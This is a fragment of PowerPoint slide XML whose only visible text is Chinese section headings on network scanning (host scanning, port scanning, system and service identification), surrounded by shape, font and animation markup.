                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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p:bldP spid="81" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="82" grpId="0" bldLvl="0" animBg="1"/>
    </p:bld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5" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1847711" y="1845636"/>
            <a:ext cx="2926715" cy="1638300"/>
            <a:chOff x="280807" y="-427279"/>
            <a:chExt cx="3055299" cy="2252704"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="280807" y="-427279"/>
              <a:ext cx="3055299" cy="2252704"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1415026" y="-203755"/>
              <a:ext cx="1187251" cy="1482594"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596789" y="1989833"/>
            <a:ext cx="7328535" cy="1258570"/>
            <a:chOff x="3663165" y="953426"/>
            <a:chExt cx="5496401" cy="1108953"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4060358" y="1005461"/>
              <a:ext cx="4914900" cy="622737"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2.2 网络扫描</a:t>
              </a:r>
              <a:endParaRPr sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3663165" y="953426"/>
              <a:ext cx="5496401" cy="1108953"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="7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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6146" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="3531870"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="4331970"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.2 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="5132070"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.3 系统识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="5932170"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.4 服务识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tn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0" name="组合 49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="258445" y="2941320"/>
            <a:ext cx="11638280" cy="2962910"/>
            <a:chOff x="407" y="2772"/>
            <a:chExt cx="18328" cy="4666"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="Group 3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="407" y="5987"/>
              <a:ext cx="18328" cy="121"/>
              <a:chOff x="1765833" y="4036682"/>
              <a:chExt cx="9317522" cy="50962"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3" name="Rectangle 4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3040807" y="4036682"/>
                <a:ext cx="1683494" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="4" name="Rectangle 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4724303" y="4036682"/>
                <a:ext cx="1715155" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="Rectangle 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6435557" y="4036682"/>
                <a:ext cx="1661572" cy="50962"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent4"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Rectangle 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8087643" y="4036682"/>
                <a:ext cx="1720740" cy="50962"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Rectangle 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1765833" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Rectangle 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9808382" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="Group 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8057" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="7980911" y="2484779"/>
              <a:chExt cx="1304470" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="10" name="Group 11"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="7980911" y="2484779"/>
                <a:ext cx="1304470" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="17" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent4"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="18" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Oval 12"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8347955" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="3810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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="12" name="Group 13"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="8468992" y="4362838"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="8216107" y="2577307"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="13" name="AutoShape 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8216107" y="2577307"/>
                  <a:ext cx="464344" cy="464344"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10800 87"/>
                    <a:gd name="T1" fmla="*/ T0 w 21426"/>
                    <a:gd name="T2" fmla="+- 0 10799 73"/>
                    <a:gd name="T3" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T4" fmla="+- 0 10800 87"/>
                    <a:gd name="T5" fmla="*/ T4 w 21426"/>
                    <a:gd name="T6" fmla="+- 0 10799 73"/>
                    <a:gd name="T7" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T8" fmla="+- 0 10800 87"/>
                    <a:gd name="T9" fmla="*/ T8 w 21426"/>
                    <a:gd name="T10" fmla="+- 0 10799 73"/>
                    <a:gd name="T11" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T12" fmla="+- 0 10800 87"/>
                    <a:gd name="T13" fmla="*/ T12 w 21426"/>
                    <a:gd name="T14" fmla="+- 0 10799 73"/>
                    <a:gd name="T15" fmla="*/ 10799 h 21453"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
